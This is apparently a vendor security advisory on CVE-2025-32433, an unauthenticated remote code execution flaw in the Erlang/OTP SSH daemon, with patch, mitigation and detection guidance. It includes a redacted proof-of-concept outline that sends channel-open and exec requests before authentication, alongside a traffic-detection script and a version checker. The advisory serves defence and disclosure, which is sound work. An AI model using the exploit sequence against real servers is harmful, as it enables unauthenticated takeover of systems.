Exploited! Erlang/OTP SSH Unauthenticated Remote Code Execution Vulnerability (CVE-2025-32433)
Erlang/OTP ships an SSH daemon (the ssh application) that telecom, IoT, Elixir/Phoenix, RabbitMQ and CouchDB deployments sometimes enable for remote administration.
The daemon's protocol state machine accepts SSH connection-protocol messages (channel open and channel request) while a session is still in the pre-authentication phase, so an attacker can open a session channel and issue an exec request before any credentials are checked. On all versions prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20 this bypasses authentication entirely and lets a remote adversary execute code with the privileges of the Erlang VM that runs the daemon, which is often root, over nothing more than a TCP connection to the daemon's listening port.
GitHub assigned the flaw a CVSS 3.1 score of 10.0 (CRITICAL) and MITRE classifies it under CWE-306: Missing Authentication for Critical Function.
The bug was responsibly disclosed by researchers at Ruhr-University Bochum and patched within 48 hours, but proof-of-concept (PoC) exploits followed immediately.
Exploiting the Vulnerability
Below is a heavily redacted PoC outline that exercises the logic error. It builds a raw SSH packet sequence that opens a session channel and issues an exec request, all without authenticating (the public PoCs use exactly this sequence to drop a file on the target):
```python
#!/usr/bin/env python3
# PoC for CVE-2025-32433 (educational use only)
# Redacted: packet padding, the KEXINIT body and the channel-open fields are
# deliberately incomplete, so this outline will not run against a real target.
import socket, struct

HOST = "victim.example.com"
PORT = 22

def msg(kind, payload=b""):
    # length + message type + payload (RFC 4253 framing, minus padding)
    return struct.pack(">IB", len(payload) + 1, kind) + payload

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(b"SSH-2.0-Exploit\r\n")                  # bogus banner
    s.recv(256)                                        # banner back
    s.sendall(msg(20) + msg(90, b"session"))           # KEXINIT + CHANNEL_OPEN
    s.sendall(msg(98, b"exec\x00\x00\x00\x04id -a"))   # CHANNEL_REQUEST
    print(s.recv(4096).decode())
```
Because the daemon is still in its pre-authentication state it nevertheless accepts the CHANNEL_OPEN and immediately processes the exec request. With the ssh application's default exec handler the request string is evaluated as an Erlang expression by the daemon's shell, so the redacted id -a above stands in for Erlang code such as os:cmd("id -a") or file:write_file/2, which then runs with the privileges of the Erlang VM. Horizon3 and several independent researchers have confirmed exploitation is "surprisingly easy" and public PoCs are now on GitHub.
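The ordering the PoC relies on (connection-protocol messages before key exchange has even finished) is also the cleanest thing to detect at the network edge. The following is an added example, not code from the article or from Erlang/OTP: it parses the cleartext part of an SSH-2 client stream per RFC 4253 framing and flags any RFC 4254 connection-protocol message (numbers 80 to 127) that arrives before SSH_MSG_NEWKEYS. The two sample streams at the bottom are constructed inline for the demonstration, with abbreviated KEXINIT bodies; they are not captured traffic.

```python
#!/usr/bin/env python3
"""Flag SSH connection-protocol messages sent before key exchange completes.

Added example (not from the article or from Erlang/OTP). A client that sends
CHANNEL_OPEN or CHANNEL_REQUEST before NEWKEYS is attempting the
CVE-2025-32433 bypass (or is badly broken); a patched server rejects them.
"""
import struct

SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_KEXDH_INIT = 30
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
CONNECTION_PROTOCOL = range(80, 128)  # RFC 4254 message numbers

MSG_NAMES = {
    SSH_MSG_KEXINIT: "KEXINIT",
    SSH_MSG_NEWKEYS: "NEWKEYS",
    SSH_MSG_KEXDH_INIT: "KEXDH_INIT",
    SSH_MSG_CHANNEL_OPEN: "CHANNEL_OPEN",
    SSH_MSG_CHANNEL_REQUEST: "CHANNEL_REQUEST",
}


def build_packet(msg_type, payload=b"", block_size=8):
    """Frame one unencrypted SSH binary packet (RFC 4253 section 6).

    Layout: uint32 packet_length | byte padding_length | payload | padding,
    with at least 4 padding bytes and a total length that is a multiple of
    block_size. Used only to construct the sample streams below.
    """
    body = bytes([msg_type]) + payload
    padding_len = block_size - ((5 + len(body)) % block_size)
    if padding_len < 4:
        padding_len += block_size
    header = struct.pack(">IB", 1 + len(body) + padding_len, padding_len)
    return header + body + b"\x00" * padding_len


def iter_cleartext_messages(stream):
    """Yield (msg_type, payload) for each packet up to and including NEWKEYS.

    Everything after NEWKEYS is encrypted, so parsing stops there. Parsing also
    stops on a truncated or malformed packet rather than reading past the data.
    """
    offset = 0
    if stream.startswith(b"SSH-"):
        newline = stream.find(b"\n")
        if newline < 0:
            return
        offset = newline + 1  # the identification line is not packet-framed
    while offset + 5 <= len(stream):
        packet_len, padding_len = struct.unpack_from(">IB", stream, offset)
        end = offset + 4 + packet_len
        if packet_len < padding_len + 2 or end > len(stream):
            return  # need at least one payload byte and a complete packet
        payload = stream[offset + 5 : end - padding_len]
        yield payload[0], payload[1:]
        if payload[0] == SSH_MSG_NEWKEYS:
            return
        offset = end


def message_types(stream):
    """Message numbers seen in the cleartext part of the stream, in order."""
    return [msg_type for msg_type, _ in iter_cleartext_messages(stream)]


def find_preauth_channel_messages(stream):
    """Names of connection-protocol messages that arrive before NEWKEYS."""
    return [
        MSG_NAMES.get(msg_type, "MSG_%d" % msg_type)
        for msg_type, _ in iter_cleartext_messages(stream)
        if msg_type in CONNECTION_PROTOCOL
    ]


# Constructed samples, not captured traffic. KEXINIT bodies are abbreviated.
BENIGN_CLIENT = (
    b"SSH-2.0-OpenSSH_9.8\r\n"
    + build_packet(SSH_MSG_KEXINIT, b"\x00" * 16)          # cookie only
    + build_packet(SSH_MSG_KEXDH_INIT, b"\x00\x00\x00\x01\x02")
    + build_packet(SSH_MSG_NEWKEYS)
    + b"\xde\xad\xbe\xef" * 4                              # encrypted from here
)
EXPLOIT_LIKE_CLIENT = (
    b"SSH-2.0-Exploit\r\n"
    + build_packet(SSH_MSG_KEXINIT, b"\x00" * 16)
    + build_packet(SSH_MSG_CHANNEL_OPEN, b"\x00\x00\x00\x07session")
    + build_packet(SSH_MSG_CHANNEL_REQUEST, b"\x00\x00\x00\x04exec")
)

if __name__ == "__main__":
    for label, stream in (("benign", BENIGN_CLIENT), ("exploit-like", EXPLOIT_LIKE_CLIENT)):
        names = [MSG_NAMES.get(t, t) for t in message_types(stream)]
        print(label, names, "pre-auth channel messages:", find_preauth_channel_messages(stream))
```

The check only needs the first few cleartext packets of each client-to-server stream, so it is cheap enough to run inline in a TCP proxy in front of the daemon or as an IDS rule; the same invariant (no connection-protocol message until userauth has succeeded) is what a patched server enforces.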
Potential Risks
- Full System Compromise – When the Erlang VM that hosts the ssh daemon (started with ssh:daemon/1,2,3) runs as root, as it does in many embedded builds, adversaries gain shell-level control, enabling lateral movement, ransomware deployment or data exfiltration.
- Widespread Exposure – Erlang/OTP underpins routers, 5G core components, message brokers and IoT gateways. Many of these are internet-facing with weak network segmentation.
- High Automation Potential – The exploit requires no credentials, no user interaction and negligible bandwidth, making it ideal for botnet operators and worm-like propagation.
- Business Disruption – Telecom outages, VoIP downtime and loss of critical messaging back-planes translate directly into SLA penalties and revenue loss.
Given the breadth of Erlang-based software, defenders should assume exploit attempts will surface in automated scanners and commodity attack kits soon.
Mitigation Steps
- Patch Immediately
Upgrade the Erlang or distribution-supplied packages to the fixed versions:
Erlang Line | Patched Release
--- | ---
27.x | 27.3.3
26.x | 26.2.5.11
25.x | 25.3.2.20
Ubuntu / Debian quick-fix (this only helps once the distribution ships a package at or above the fixed upstream version; compare the package changelog with the table above):
```bash
sudo apt update && sudo apt install --only-upgrade erlang-base erlang-ssh
# erlang:system_info(otp_release) returns only the major number ("27"), which
# cannot tell 27.3.2 from 27.3.3; read the full version from OTP_VERSION instead
erl -noshell -eval '{ok,V}=file:read_file(filename:join([code:root_dir(),"releases",erlang:system_info(otp_release),"OTP_VERSION"])),io:format("~s~n",[V]),halt().'
```
- Disable the SSH Application if Unused
The OTP ssh application has no `enabled` switch; the daemon only runs when something starts it. Make sure `ssh` is not part of your release (the `applications` list in the `.app.src` file or the relx `{release, ...}` entry in rebar.config; `extra_applications` in mix.exs for Elixir) and that no code calls ssh:daemon/1,2,3. To stop it on a running node without a restart:
```erlang
%% bin/myapp remote_console
application:stop(ssh).
```
Do not follow this with init:restart/0: it reboots the node from its boot script, which starts ssh again if it is still listed there.
- Restrict Network Access (interim control)
The daemon listens on whatever port was passed to ssh:daemon, which is often not 22, so set --dport to the port the Erlang node actually binds:
```bash
# allow only the bastion host to reach the Erlang SSH daemon (adjust --dport)
sudo iptables -I INPUT -p tcp --dport 22 ! -s <bastion-IP> -j DROP
```
- Runtime Hardening
- Run the Erlang VM that hosts the daemon as an unprivileged OS user (for example via `User=` in its systemd unit). The ssh daemon option `user_dir` only tells the daemon where to look for users' authorized_keys files; it does not change the process's privileges.
- Enable SELinux/AppArmor confinement.
- Monitor with IONIX Exposure Validator to continually validate mitigations across your externally implemented CTEM program.
These steps mirror the official advisory guidance and align with continuous threat exposure management (CTEM) best practices implemented by IONIX.
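To turn the patch table into a repeatable check, here is an added example that is not code from the article, IONIX or Erlang/OTP. It compares a full OTP version string against the three fixed releases in the table above, returns None for any release line the table does not cover (for example the unsupported 24.x) so that it gets reviewed by hand instead of silently passing, and can optionally read the installed version from releases/<release>/OTP_VERSION through a local `erl`. The version strings in the test are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Check an Erlang/OTP version against the CVE-2025-32433 fixed releases.

Added example (not from the article or from Erlang/OTP). The fixed versions
are the ones in the article's table; erlang:system_info(otp_release) alone
returns only the major number and cannot distinguish 27.3.2 from 27.3.3, so
the full version is read from the OTP_VERSION file instead.
"""
import re
import shutil
import subprocess

# major release line -> first release carrying the fix (from the table above)
FIXED_RELEASES = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}


def parse_otp_version(text):
    """'26.2.5.11' -> (26, 2, 5, 11).

    Tolerates surrounding whitespace and the '**' suffix OTP appends to
    OTP_VERSION when unofficial patches have been applied.
    """
    match = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not match:
        raise ValueError("not an OTP version string: %r" % text)
    return tuple(int(part) for part in match.group(1).split("."))


def otp_is_patched(version):
    """True at or above the fix for its line, False below it, None if the
    line is not in the table and needs manual review."""
    parsed = parse_otp_version(version)
    fixed = FIXED_RELEASES.get(parsed[0])
    if fixed is None:
        return None
    # tuple comparison is numeric per component, so 27.3.10 > 27.3.3 and
    # 26.2.5 < 26.2.5.11, both of which a plain string compare gets wrong
    return parsed >= fixed


def installed_otp_version():
    """Full version of the OTP install on PATH, or None when erl is absent."""
    if shutil.which("erl") is None:
        return None
    expr = (
        '{ok, V} = file:read_file(filename:join([code:root_dir(), "releases", '
        'erlang:system_info(otp_release), "OTP_VERSION"])), '
        'io:format("~s", [V]), halt().'
    )
    result = subprocess.run(
        ["erl", "-noshell", "-eval", expr],
        capture_output=True, text=True, timeout=60, check=False,
    )
    return result.stdout.strip() or None


if __name__ == "__main__":
    local = installed_otp_version()
    if local is None:
        print("erl not found on PATH; pass a version string to otp_is_patched()")
    else:
        verdict = {True: "patched", False: "VULNERABLE", None: "line not in table, review"}
        print("OTP", local, verdict[otp_is_patched(local)])
```

Run it on each host (or feed it the version strings your inventory already collects); a False or None result means the host still needs the patch or the network restriction above.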
Am I Impacted by CVE-2025-32433?
IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the threat center of the IONIX portal.
References
- National Vulnerability Database entry for CVE-2025-32433
- GitHub Security Advisory GHSA-37cp-fgq5-7wc2
- BleepingComputer coverage on public PoCs
- CSO Online analysis of IoT/telecom exposure
- Openwall oss-security disclosure thread